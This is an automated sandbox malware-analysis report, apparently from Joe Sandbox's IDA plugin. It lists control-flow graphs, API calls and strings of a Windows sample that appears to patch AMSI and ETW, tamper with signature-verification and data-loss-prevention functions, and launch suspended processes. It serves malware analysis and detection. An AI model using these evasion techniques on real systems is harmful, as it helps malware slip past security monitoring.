call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 * 16 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c47b98 call 2c4818c call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 ExitProcess 5463->5553 5554 2c58c7a-2c58c89 call 2c34898 5463->5554 5571 2c57e42-2c57eb9 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 5464->5571 5572 2c57ebe-2c57fc9 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 5464->5572 5554->5553 5563 2c58c8f-2c58f62 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c4e540 call 2c3480c call 2c3494c call 2c346a4 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c37e18 5554->5563 5821 2c58f68-2c59215 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c34d8c * 2 call 2c34734 call 2c4dacc 5563->5821 5822 2c5921a-2c5941b call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c349a4 call 2c48bb0 5563->5822 5571->5572 5674 2c57fd0-2c582f0 call 2c349a4 call 2c4dc90 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c4cfa4 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 5572->5674 5675 2c57fcb-2c57fce 5572->5675 5991 2c582f2-2c58304 call 2c48584 5674->5991 5992 2c58309-2c58aec call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 ResumeThread call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 CloseHandle call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c47ed4 call 2c487a0 * 6 CloseHandle call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 5674->5992 5675->5674 5821->5822 5822->5553 5991->5992 5992->5463
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
                                                                                                                                        • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
                                                                                                                                      • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D857DC,02D85820,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C), ref: 02C57E39
                                                                                                                                      • ResumeThread.KERNEL32(00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8), ref: 02C58483
                                                                                                                                      • CloseHandle.KERNEL32(00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C), ref: 02C58602
                                                                                                                                        • Part of subcall function 02C487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
                                                                                                                                        • Part of subcall function 02C487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
                                                                                                                                        • Part of subcall function 02C487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02C9137C,02C5AFD8,UacInitialize,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C), ref: 02C589F4
                                                                                                                                        • Part of subcall function 02C37E18: GetFileAttributesA.KERNEL32(00000000,?,02C4F8CC,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,UacInitialize), ref: 02C37E23
                                                                                                                                        • Part of subcall function 02C4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DB9E), ref: 02C4DB0B
                                                                                                                                        • Part of subcall function 02C4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C4DB45
                                                                                                                                        • Part of subcall function 02C4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C4DB72
                                                                                                                                        • Part of subcall function 02C4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C4DB7B
                                                                                                                                        • Part of subcall function 02C4818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C48216), ref: 02C481F8
                                                                                                                                      • ExitProcess.KERNEL32(00000000,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,Initialize,02C9137C,02C5AFD8,00000000,00000000,00000000,ScanString,02C9137C,02C5AFD8), ref: 02C5AA25
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                                                                                      • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                      • API String ID: 1548959583-1225450241
                                                                                                                                      • Opcode ID: 93ec6913586ea9cd987206228e2362ffc2e4d4f9b112f8fa08b66d226fd45c6d
                                                                                                                                      • Instruction ID: 277b592f913506e3fe2b7f684f30b3cf71ec2f6a101f2ac9799412016700788a
                                                                                                                                      • Opcode Fuzzy Hash: 93ec6913586ea9cd987206228e2362ffc2e4d4f9b112f8fa08b66d226fd45c6d
                                                                                                                                      • Instruction Fuzzy Hash: 37433EB5A501688FCB2AEB64DD809DE73BAFF84300F1046E1E409E7214DA31EE85EF55
                                                                                                                                      Function 02C31724 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 289sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8535 2c31724-2c31736 8536 2c31968-2c3196d 8535->8536 8537 2c3173c-2c3174c 8535->8537 8540 2c31973-2c31984 8536->8540 8541 2c31a80-2c31a83 8536->8541 8538 2c317a4-2c317ad 8537->8538 8539 2c3174e-2c3175b 8537->8539 8538->8539 8546 2c317af-2c317bb 8538->8546 8542 2c31774-2c31780 8539->8542 8543 2c3175d-2c3176a 8539->8543 8544 2c31986-2c319a2 8540->8544 8545 2c31938-2c31945 8540->8545 8547 2c31684-2c316ad VirtualAlloc 8541->8547 8548 2c31a89-2c31a8b 8541->8548 8552 2c31782-2c31790 8542->8552 8553 2c317f0-2c317f9 8542->8553 8549 2c31794-2c317a1 8543->8549 8550 2c3176c-2c31770 8543->8550 8556 2c319b0-2c319bf 8544->8556 8557 2c319a4-2c319ac 8544->8557 8545->8544 8551 2c31947-2c3195b Sleep 8545->8551 8546->8539 8558 2c317bd-2c317c9 8546->8558 8554 2c316df-2c316e5 8547->8554 8555 2c316af-2c316dc call 2c31644 8547->8555 8551->8544 8561 2c3195d-2c31964 Sleep 8551->8561 8559 2c317fb-2c31808 8553->8559 8560 2c3182c-2c31836 8553->8560 8555->8554 8564 2c319c1-2c319d5 8556->8564 8565 2c319d8-2c319e0 8556->8565 8563 2c31a0c-2c31a22 8557->8563 8558->8539 8566 2c317cb-2c317de Sleep 8558->8566 8559->8560 8567 2c3180a-2c3181e Sleep 8559->8567 8568 2c318a8-2c318b4 8560->8568 8569 2c31838-2c31863 8560->8569 8561->8545 8570 2c31a24-2c31a32 8563->8570 8571 2c31a3b-2c31a47 8563->8571 8564->8563 8574 2c319e2-2c319fa 8565->8574 8575 2c319fc-2c319fe call 2c315cc 8565->8575 8566->8539 8573 2c317e4-2c317eb Sleep 8566->8573 8567->8560 8578 2c31820-2c31827 Sleep 8567->8578 8584 2c318b6-2c318c8 8568->8584 8585 2c318dc-2c318eb call 2c315cc 8568->8585 8579 2c31865-2c31873 8569->8579 8580 2c3187c-2c3188a 8569->8580 8570->8571 8581 2c31a34 8570->8581 8582 2c31a49-2c31a5c 8571->8582 8583 2c31a68 8571->8583 8573->8538 8576 2c31a03-2c31a0b 8574->8576 8575->8576 8578->8559 8579->8580 8587 2c31875 8579->8587 8588 2c318f8 8580->8588 8589 2c3188c-2c318a6 call 2c31500 8580->8589 8581->8571 8590 2c31a5e-2c31a63 call 2c31500 8582->8590 8591 2c31a6d-2c31a7f 8582->8591 8583->8591 8592 2c318ca 8584->8592 8593 2c318cc-2c318da 8584->8593 8595 2c318fd-2c31936 8585->8595 8598 2c318ed-2c318f7 8585->8598 8587->8580 8588->8595 8589->8595 8590->8591 8592->8593 8593->8595
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 02C317D0
                                                                                                                                      • Sleep.KERNEL32(0000000A,00000000), ref: 02C317E6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: 0`
                                                                                                                                      • API String ID: 3472027048-3339448193
                                                                                                                                      • Opcode ID: e7fb214c0a20c58dbbeb4f9d4ffbc0180e38c7b1066b5bbb5ee9ef190d9d49f6
                                                                                                                                      • Instruction ID: 017eb86d364f8b19aba831356fe941b370faa2115aedf1b743a1050a886fb315
                                                                                                                                      • Opcode Fuzzy Hash: e7fb214c0a20c58dbbeb4f9d4ffbc0180e38c7b1066b5bbb5ee9ef190d9d49f6
                                                                                                                                      • Instruction Fuzzy Hash: 3AB12372A003518FEB16CF29D884355BBE1FB85325F1CCAAEE54E8B385D7B0A551CB90
                                                                                                                                      Function 02C31A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 10477 2c31a8c-2c31a9b 10478 2c31aa1-2c31aa5 10477->10478 10479 2c31b6c-2c31b6f 10477->10479 10482 2c31aa7-2c31aae 10478->10482 10483 2c31b08-2c31b11 10478->10483 10480 2c31b75-2c31b7f 10479->10480 10481 2c31c5c-2c31c60 10479->10481 10484 2c31b81-2c31b8d 10480->10484 10485 2c31b3c-2c31b49 10480->10485 10488 2c31c66-2c31c6b 10481->10488 10489 2c316e8-2c3170b call 2c31644 VirtualFree 10481->10489 10486 2c31ab0-2c31abb 10482->10486 10487 2c31adc-2c31ade 10482->10487 10483->10482 10490 2c31b13-2c31b27 Sleep 10483->10490 10491 2c31bc4-2c31bd2 10484->10491 10492 2c31b8f-2c31b92 10484->10492 10485->10484 10499 2c31b4b-2c31b5f Sleep 10485->10499 10493 2c31ac4-2c31ad9 10486->10493 10494 2c31abd-2c31ac2 10486->10494 10496 2c31af3 10487->10496 10497 2c31ae0-2c31af1 10487->10497 10507 2c31716 10489->10507 10508 2c3170d-2c31714 10489->10508 10490->10482 10498 2c31b2d-2c31b38 Sleep 10490->10498 10500 2c31b96-2c31b9a 10491->10500 10503 2c31bd4-2c31bd9 call 2c314c0 10491->10503 10492->10500 10502 2c31af6-2c31b03 10496->10502 10497->10496 10497->10502 10498->10483 10499->10484 10504 2c31b61-2c31b68 Sleep 10499->10504 10505 2c31bdc-2c31be9 10500->10505 10506 2c31b9c-2c31ba2 10500->10506 10502->10480 10503->10500 10504->10485 10505->10506 10514 2c31beb-2c31bf2 call 2c314c0 10505->10514 10510 2c31bf4-2c31bfe 10506->10510 10511 2c31ba4-2c31bc2 call 2c31500 10506->10511 10512 2c31719-2c31723 10507->10512 10508->10512 10515 2c31c00-2c31c28 VirtualFree 10510->10515 10516 2c31c2c-2c31c59 call 2c31560 10510->10516 10514->10506
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,00000000,02C31FE4), ref: 02C31B17
                                                                                                                                      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02C31FE4), ref: 02C31B31
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: 0`
                                                                                                                                      • API String ID: 3472027048-3339448193
                                                                                                                                      • Opcode ID: 5cacde97b5b612117085a6bdadc1037e764bfde5dd435e2ea4e6f05cc9618f12
                                                                                                                                      • Instruction ID: e2a4c9c5a45dac62d67776d795f2b3c5bbe2b0898e4dfe99300841dfdd786f24
                                                                                                                                      • Opcode Fuzzy Hash: 5cacde97b5b612117085a6bdadc1037e764bfde5dd435e2ea4e6f05cc9618f12
                                                                                                                                      • Instruction Fuzzy Hash: 0E51D2716413408FE716DF68C984796BBD0AF85328F1C8AAEE54DCB282E7F0D545CBA1
                                                                                                                                      Function 02C4870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryW.KERNEL32(amsi), ref: 02C48715
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                        • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C48774
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                      • String ID: DllGetClassObject$W$amsi
                                                                                                                                      • API String ID: 941070894-2671292670
                                                                                                                                      • Opcode ID: 74644a190c8eeffba923f1e1a2df1bc9695e3d1b873cc69756181fc187edd55e
                                                                                                                                      • Instruction ID: 457e32191beb9f47b59906b85faebf8c7baf19007d83900c77aa80edd7df08a2
                                                                                                                                      • Opcode Fuzzy Hash: 74644a190c8eeffba923f1e1a2df1bc9695e3d1b873cc69756181fc187edd55e
                                                                                                                                      • Instruction Fuzzy Hash: 2AF0C25114C381B9E201E6748C45F4FBFCD4B92224F448F5CF1E89A2D2DA79D108ABB7
                                                                                                                                      Function 02C4E2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C4E436
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CheckConnectionInternet
                                                                                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                      • API String ID: 3847983778-3852638603
                                                                                                                                      • Opcode ID: e59c8983fe1c2e85b027e4d65f4e02582e629593d9ebc0d17fe5b010f0a83246
                                                                                                                                      • Instruction ID: 4a5f9952606cfbe9499ebd39d8182214ff08623dca9652df93c4683cd646455a
                                                                                                                                      • Opcode Fuzzy Hash: e59c8983fe1c2e85b027e4d65f4e02582e629593d9ebc0d17fe5b010f0a83246
                                                                                                                                      • Instruction Fuzzy Hash: CA41ED75B502089BEB26EBE4DC41ADEB3FAFF8C720F614835E441A7250DA74AD059F60
                                                                                                                                      Function 02C4840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02C48478
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
